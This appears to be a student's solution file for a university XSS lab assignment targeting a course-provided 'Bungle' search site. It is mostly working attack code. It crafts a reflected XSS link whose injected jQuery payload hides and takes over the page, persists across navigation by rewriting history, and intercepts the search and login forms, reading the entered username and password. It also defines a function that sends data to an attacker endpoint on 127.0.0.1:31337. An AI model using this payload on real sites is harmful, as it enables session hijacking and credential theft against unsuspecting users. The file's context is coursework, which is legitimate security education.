xss

1. <meta charset="utf-8">
2. <script src="http://ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>
3. <script>
4. function payload(attacker) {
5.  
6. function log(data) {
7. console.log($.param(data));
8. $.get(attacker, data);
9. }
10.  
11. function loadcallback() {
12. console.log("callback called");
13.  
14. $("html").show();
15.  
16. $('#bungle-lnk').removeAttr("href");
17. $('#bungle-lnk').click(function() {
18. proxy('/', history.state['url'] != '/');
19. });
20.  
21. $('#search-again-btn').removeAttr("href");
22. $('#search-again-btn').click(function() {
23. proxy('/', true)
24. });
25.  
26. $('.history-item').each(function() {
27. var value = $(this).attr('href');
28. $(this).removeAttr('href');
29. $(this).click(function () {
30. proxy(value, true);
31. });
32. });
33.  
34. // hijack search form
35. $('#search-btn').click(function(e) {
36. e.preventDefault();
37. var attr = $("#query").val();
38.  
39. // log to attacker
40. console.log("search clicked");
41.  
42. // fill in page
43. $.ajax({
44. url: "./search",
45. data: {
46. q: attr
47. },
48. type: "GET",
49. success: function (data) {
50. $("html").html(data);
51. proxy("search?q=" + attr, true);
52. }
53. });
54. });
55.  
56. $('#log-in-btn').click(function(e) {
57. e.preventDefault();
58. var un = $('#username').val();
59. var pw = $('#userpass').val();
60.  
61. //TODO: log to attacker
62. console.log("btn clicked: " + un + ", " + pw);
63.  
64. $.ajax({
65. url: "./login",
66. data: {
67. username: un,
68. password: pw,
69. },
70. type: "POST",
71. success: function (data) {
72. $("html").html(data);
73. history.replaceState({url: "/", html: $("html").html()}, "", "/");
74. proxy("/", false);
75. }
76. });
77. });
78. }
79.  
80. function proxy(href, shouldPush) {
81. console.log('proxy called');
82.  
83. // add appropriate url to the history stack
84. if (shouldPush) {
85. $("html").load(href, function() {
86. loadcallback();
87. history.pushState({url: href, html: $("html").html()}, "", href);
88. });
89. }
90.  
91. else {
92. $("html").html(history.state["html"]);
93. loadcallback();
94. }
95. }
96.  
97. // do this on first injection
98. $("html").hide();
99. $(document).ready(function() {
100.  
101. // load script to the page
102. var script = document.createElement('script');
103. script.type = "text/javascript";
104. script.text = "var attacker = '" + attacker + "';\n" + proxy.toString() + "\n" + log.toString() + "\n" + loadcallback.toString();
105. $("html").append(script);
106.  
107. // popstate hander
108. window.onpopstate = function(e) {
109. proxy(e.state['url'], false);
110. };
111.  
112. // initial history and page setup
113. history.replaceState(null, "", "/"); // avoid flashing link
114. $("html").load("/", function() {
115. loadcallback();
116. history.replaceState({url: "/", html: $("html").html()}, "", "/");
117. });
118. });
119. }
120.  
121. function makeLink(xssdefense, target, attacker) {
122. if (xssdefense == 0) {
123. return target + "/search?xssdefense=" + xssdefense.toString() + "&q=" + encodeURIComponent("<script" + ">" + payload.toString() + ";payload(\"" + attacker + "\");<\/script" + ">");
124. } else { // Implement code to defeat XSS defenses here.
125. }
126. }
127. var xssdefense = 0;
128. var target = "http://cos432-assn3.cs.princeton.edu/";
129. var attacker = "http://127.0.0.1:31337/stolen";
130. $(function() {
131. var url = makeLink(xssdefense, target, attacker);
132. $("h3").html("<a target=\"run\" href=\"" + url + "\">Try Bungle!</a>");
133. });
134. </script>
135. <h3>parse error</h3>